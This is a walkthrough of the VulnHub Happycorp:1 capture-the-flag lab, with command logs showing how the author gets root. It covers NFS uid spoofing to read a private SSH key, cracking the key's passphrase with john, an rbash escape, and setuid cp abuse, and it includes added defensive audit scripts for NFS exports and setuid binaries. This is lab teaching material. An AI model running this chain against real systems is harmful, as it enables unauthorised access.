__    _____        _____     _____ _ _____
        |  |  |  _  |   ___|  _  |___|  |  |_|_   _|___
        |  |__|     |  |  _|     |_ -|     | | | | | .'| 
        |_____|__|__|  |___|__|__|___|__|__|_| |_| |__,|
			hello@lacashita.com

 
 [VULNHUB] Happycorp:1[1]

NMAP
-----

--[sml@cassandra][~/Descargas]
$nmap -A -p- 192.168.131.129
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-10 23:07 CEST
Nmap scan report for 192.168.131.129
Host is up (0.00037s latency).
Not shown: 65527 closed ports
PORT      STATE SERVICE  VERSION
22/tcp    open  ssh      OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 81:ea:90:61:be:0a:f2:8d:c3:4e:41:03:f0:07:8b:93 (RSA)
|   256 f6:07:4a:7e:1d:d8:cf:a7:cc:fd:fb:b3:18:ce:b3:af (ECDSA)
|_  256 64:9a:52:7b:75:b7:92:0d:4b:78:71:26:65:37:6c:bd (ED25519)
80/tcp    open  http     Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 1 disallowed entry 
|_/admin.php
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Happycorp
111/tcp   open  rpcbind  2-4 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100003  3,4         2049/tcp  nfs
|   100003  3,4         2049/udp  nfs
|   100005  1,2,3      33123/udp  mountd
|   100005  1,2,3      52985/tcp  mountd
|   100021  1,3,4      35528/udp  nlockmgr
|   100021  1,3,4      44999/tcp  nlockmgr
|   100227  3           2049/tcp  nfs_acl
|_  100227  3           2049/udp  nfs_acl
2049/tcp  open  nfs_acl  3 (RPC #100227)
39589/tcp open  mountd   1-3 (RPC #100005)
41347/tcp open  mountd   1-3 (RPC #100005)
44999/tcp open  nlockmgr 1-4 (RPC #100021)
52985/tcp open  mountd   1-3 (RPC #100005)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.88 seconds

HTTP
----

--[sml@cassandra][~/Descargas]
$gobuster -u http://192.168.131.129/ -w /usr/share/wordlists/dirb/big.txt 

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://192.168.131.129/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirb/big.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout      : 10s
=====================================================
2019/07/10 23:09:08 Starting gobuster
=====================================================
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/contactform (Status: 301)
/css (Status: 301)
/img (Status: 301)
/js (Status: 301)
/lib (Status: 301)
/manual (Status: 301)
/pages (Status: 403)
/robots.txt (Status: 200)
/server-status (Status: 403)
=====================================================
2019/07/10 23:09:10 Finished
=====================================================

NFS
---

We look at what the NFS server exports.

--[sml@cassandra][~/Descargas]
$showmount -e 192.168.131.129
Export list for 192.168.131.129:
/home/karl *

We mount it at /tmp/zeus.

[sml@cassandra][~]
$sudo mount -t nfs 192.168.131.129:/home/karl /tmp/zeus


--[sml@cassandra][/tmp/zeus]
$ls -la
total 580
drwxr-xr-x 5 1001 1001   4096 jun 13 02:20 .
drwxrwxrwt 1 root root   1086 jul 10 23:14 ..
lrwxrwxrwx 1 root root      9 mar  5 11:11 .bash_history -> /dev/null
-rw-r--r-- 1 1001 1001    220 mar  4 22:09 .bash_logout
-rw-r--r-- 1 1001 1001   3538 mar  5 11:15 .bashrc
-rw-r--r-- 1 1001 1001    771 jun 13 02:20 cve_2017_0358.c
lrwxrwxrwx 1 1001 1001     16 jun 13 02:20 fuse.ko -> cve_2017_0358.ko
drwxr-xr-x 3 1001 1001   4096 jun 13 02:20 kernel
-rw------- 1 1001 1001     28 mar  5 02:55 .lesshst
drwxr-xr-x 3 1001 1001   4096 jun 13 02:20 lib
-rw-r--r-- 1 1001 1001    163 jun 13 02:20 Makefile
-rw-r--r-- 1 root 1001 549663 jun 13 02:20 modules.dep.bin
-rw-r--r-- 1 1001 1001    675 mar  4 22:09 .profile
drwx------ 2 1001 1001   4096 mar  5 11:10 .ssh

We see the files are owned by uid 1001, so we create a user on our own system
and give it that uid so it can access the files.

--[..][sml@cassandra][/tmp/zeus]
$sudo adduser mierder

We change the uid in /etc/passwd.

--[sml@cassandra][/tmp/zeus]
$cat /etc/passwd
mierder:x:1001:1001:,,,:/home/mierder:/bin/bash

--[sml@cassandra][/tmp/zeus]
$ls -la
total 580
drwxr-xr-x 5 mierder mierder   4096 jun 13 02:20 .
drwxrwxrwt 1 root    root      1086 jul 10 23:14 ..
lrwxrwxrwx 1 root    root         9 mar  5 11:11 .bash_history -> /dev/null
-rw-r--r-- 1 mierder mierder    220 mar  4 22:09 .bash_logout
-rw-r--r-- 1 mierder mierder   3538 mar  5 11:15 .bashrc
-rw-r--r-- 1 mierder mierder    771 jun 13 02:20 cve_2017_0358.c
lrwxrwxrwx 1 mierder mierder     16 jun 13 02:20 fuse.ko -> cve_2017_0358.ko
drwxr-xr-x 3 mierder mierder   4096 jun 13 02:20 kernel
-rw------- 1 mierder mierder     28 mar  5 02:55 .lesshst
drwxr-xr-x 3 mierder mierder   4096 jun 13 02:20 lib
-rw-r--r-- 1 mierder mierder    163 jun 13 02:20 Makefile
-rw-r--r-- 1 root    mierder 549663 jun 13 02:20 modules.dep.bin
-rw-r--r-- 1 mierder mierder    675 mar  4 22:09 .profile
drwx------ 2 mierder mierder   4096 mar  5 11:10 .ssh

--[mierder@cassandra][/tmp/zeus/.ssh]
$ls -la
total 24
drwx------ 2 mierder mierder 4096 mar  5 11:10 .
drwxr-xr-x 5 mierder mierder 4096 jun 13 02:20 ..
-rw-r--r-- 1 mierder mierder  740 mar  4 22:37 authorized_keys
-rw------- 1 mierder mierder 3326 mar  4 22:36 id_rsa
-rw-r--r-- 1 mierder mierder  740 mar  4 22:36 id_rsa.pub
-rw-r--r-- 1 mierder mierder   18 mar  5 04:02 user.txt

--[mierder@cassandra][/tmp/zeus/.ssh]
$cat user.txt
flag1{Z29vZGJveQ}
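A defender's counterpart to the export above, added here and not part of the original writeup: a POSIX shell/awk check that flags exports(5) lines with the properties that let the uid trick work (wildcard client, no all_squash, no_root_squash, a home directory exported to everyone). The option lists in the sample are constructed, since the page only shows the showmount output.

```shell
#!/bin/sh
# Added example, not part of the original writeup: audit /etc/exports lines for the
# weaknesses that made Happycorp's /home/karl export abusable from any client that
# simply picks the same uid. NFS with AUTH_SYS trusts the client's uid; only
# root_squash is on by default, so all other uids are honoured as-is.
#
# Constructed sample: line 1 approximates what "showmount -e" revealed on the box
# (the real option list is unknown), line 2 is a hardened version of the same export,
# line 3 is another common weak pattern.
SAMPLE_EXPORTS='/home/karl *(rw,sync,no_subtree_check)
/home/karl 192.168.131.0/24(rw,sync,all_squash,anonuid=65534,anongid=65534)
/srv/backup 10.0.0.5(rw,sync,no_root_squash)'

# audit_exports: reads exports(5)-style lines on stdin, prints "WEAK <path> <client>: <reasons>"
# for each client entry that needs attention, and exits 1 if anything was flagged.
audit_exports() {
    awk '
    /^#/ || NF == 0 { next }
    {
        path = $1
        for (i = 2; i <= NF; i++) {
            client = $i; opts = ""
            # split "client(opt,opt)" into client and opts; a bare client means defaults
            if (match(client, /\(.*\)$/)) {
                opts = substr(client, RSTART + 1, RLENGTH - 2)
                client = substr(client, 1, RSTART - 1)
            }
            why = ""
            if (client ~ /\*/)
                why = why " wildcard-client"
            if (opts !~ /(^|,)all_squash(,|$)/)
                why = why " uid-mapping-trusted"      # a matching uid on the client is enough
            if (opts ~ /(^|,)no_root_squash(,|$)/)
                why = why " no_root_squash"           # remote root writes as local root
            if (path ~ /^\/home(\/|$)/ && client ~ /\*/)
                why = why " home-dir-world-export"     # .ssh and dotfiles exposed to everyone
            if (why != "") { printf "WEAK %s %s:%s\n", path, client, why; found = 1 }
        }
    }
    END { exit (found ? 1 : 0) }'
}

# Stand-alone run against the constructed sample.
printf '%s\n' "$SAMPLE_EXPORTS" | audit_exports || echo "review the flagged exports"
```

On a real server, feed it `cat /etc/exports | audit_exports`; the hardened line shows the fix that survives a uid-matching client (all_squash plus a client list), with Kerberos (sec=krb5) being the stronger option where it is available.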

We download ssh2john[2] to crack the id_rsa key.
We could also use phrasen|drescher[3] to crack the key.

--[..][sml@cassandra][/tmp/zeus]
$wget https://raw.githubusercontent.com/koboi137/john/master/ssh2john.py -O /home/sml/vulnhub/happycorp/ssh2john.py
--2019-07-10 23:35:44--  https://raw.githubusercontent.com/koboi137/john/master/ssh2john.py
Resolviendo raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.132.133
Conectando con raw.githubusercontent.com (raw.githubusercontent.com)[151.101.132.133]:443... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: 7781 (7,6K) [text/plain]
Grabando a: ../home/sml/vulnhub/happycorp/ssh2john.py.

/home/sml/vulnhub/h 100%[===================>]   7,60K  --.-KB/s    en 0s      

2019-07-10 23:35:44 (32,6 MB/s) - ../home/sml/vulnhub/happycorp/ssh2john.py. guardado [7781/7781]

--[sml@cassandra][/tmp/zeus]
$python /home/sml/vulnhub/happycorp/ssh2john.py
Usage: /home/sml/vulnhub/happycorp/ssh2john.py 

--[mierder@cassandra][/tmp/zeus/.ssh]
$python /home/sml/vulnhub/happycorp/ssh2john.py id_rsa > /tmp/pacrackear

--[sml@cassandra][/tmp]
$john --wordlist=/home/sml/vulnhub/rockyou.txt pacrackear
Created directory: /home/sml/.john
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
sheep            (id_rsa)



LOW SHELL
----------

We connect over ssh passing /bin/bash -i, since otherwise we land in an rbash.

--[mierder@cassandra][/tmp/zeus/.ssh]
$ssh -i id_rsa karl@192.168.131.129 /bin/bash -i
Error: the user is not allowed to use Firejail. Please add the user in /etc/firejail/firejail.users file, either by running "sudo firecfg", or by editing the file directly.
See "man firejail-users" for more details.
Enter passphrase for key 'id_rsa': 
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
id
uid=1001(karl) gid=1001(karl) groups=1001(karl)
python -c 'import pty; pty.spawn("/bin/sh")'
$

We look for setuid files.

$ find / -perm /4000 2>/dev/null
find / -perm /4000 2>/dev/null
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/chsh
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/sbin/mount.nfs
/bin/mount
/bin/ping
/bin/cp
/bin/umount
/bin/su

Since we can copy (cp) with privileges, we take advantage of it and copy the .ssh
folder to /root so we can connect as root with the key/passphrase we already know.

$ cp -r .ssh /root
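Added here as a defender's check, not part of the original writeup: comparing a host's setuid inventory against a baseline of the binaries that are setuid on a stock Debian 9 install. The baseline is constructed from the find output above minus /bin/cp, which is the entry that should not be there.

```shell
#!/bin/sh
# Added example (not from the writeup): compare a host's setuid inventory against a
# known-good baseline and report anything extra. The baseline is constructed from
# the stock Debian 9 binaries in the box's "find / -perm /4000" output; the one
# entry on the box that does not belong there is /bin/cp, which is how root was reached.
SUID_BASELINE='/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/chsh
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/sbin/mount.nfs
/bin/mount
/bin/ping
/bin/umount
/bin/su'

# Constructed sample input: the setuid list found on Happycorp (baseline plus /bin/cp).
SAMPLE_FIND_OUTPUT="$SUID_BASELINE
/bin/cp"

# audit_suid: reads setuid paths on stdin (e.g. find / -perm /4000 2>/dev/null),
# prints one line per path missing from the baseline, exits 1 if any were found.
audit_suid() {
    tmp=$(mktemp)
    printf '%s\n' "$SUID_BASELINE" > "$tmp"
    awk -v baseline="$tmp" '
        BEGIN { while ((getline line < baseline) > 0) ok[line] = 1; close(baseline) }
        NF && !($0 in ok) { printf "UNEXPECTED setuid: %s (fix: chmod u-s %s)\n", $0, $0; n++ }
        END { exit (n ? 1 : 0) }'
    status=$?
    rm -f "$tmp"
    return "$status"
}

# Stand-alone run against the constructed sample.
printf '%s\n' "$SAMPLE_FIND_OUTPUT" | audit_suid || echo "setuid baseline drift detected"
```

Run it from cron or a config-management check with `find / -perm /4000 2>/dev/null | audit_suid`; a nonzero exit is the alert, and the printed chmod is the immediate fix for a binary like cp that has no business being setuid.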

ROOT SHELL
----------

--[mierder@cassandra][/tmp/zeus/.ssh]
$ssh -i id_rsa root@192.168.131.129
Error: the user is not allowed to use Firejail. Please add the user in /etc/firejail/firejail.users file, either by running "sudo firecfg", or by editing the file directly.
See "man firejail-users" for more details.
Enter passphrase for key 'id_rsa': 
Linux happycorp 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
root@happycorp:~# id
uid=0(root) gid=0(root) groups=0(root)
root@happycorp:~# ls
root.txt
root@happycorp:~# cat root.txt 
Congrats!
flag2{aGFja2VyZ29k}
Here is some useless ascii art :)
           ,----------------,              ,---------,
        ,-----------------------,          ,"        ,"|
      ,"                      ,"|        ,"        ,"  |
     +-----------------------+  |      ,"        ,"    |
     |  .-----------------.  |  |     +---------+      |
     |  |                 |  |  |     | -==----'|      |
     |  |                 |  |  |     |         |      |
     |  |  Hacker God     |  |  |/----|`---=    |      |
     |  |  C:\>_          |  |  |   ,/|==== ooo |      ;
     |  |                 |  |  |  // |(((( [33]|    ,"
     |  `-----------------'  |," .;'| |((((     |  ,"
     +-----------------------+  ;;  | |         |,"
        /_)______________(_/  //'   | +---------+
   ___________________________/___  `,
  /  oooooooooooooooo  .o.  oooo /,   \,"-----------
 / ==ooooooooooooooo==.o.  ooo= //   ,`\--{)B     ,"
/_==__==========__==_ooo__ooo=_/'   /___________,"


 -Zayotic



[1] https://www.vulnhub.com/entry/happycorp-1,296/
[2] https://raw.githubusercontent.com/koboi137/john/master/ssh2john.py
[3] http://leidecker.info/projects/phrasendrescher/index.shtml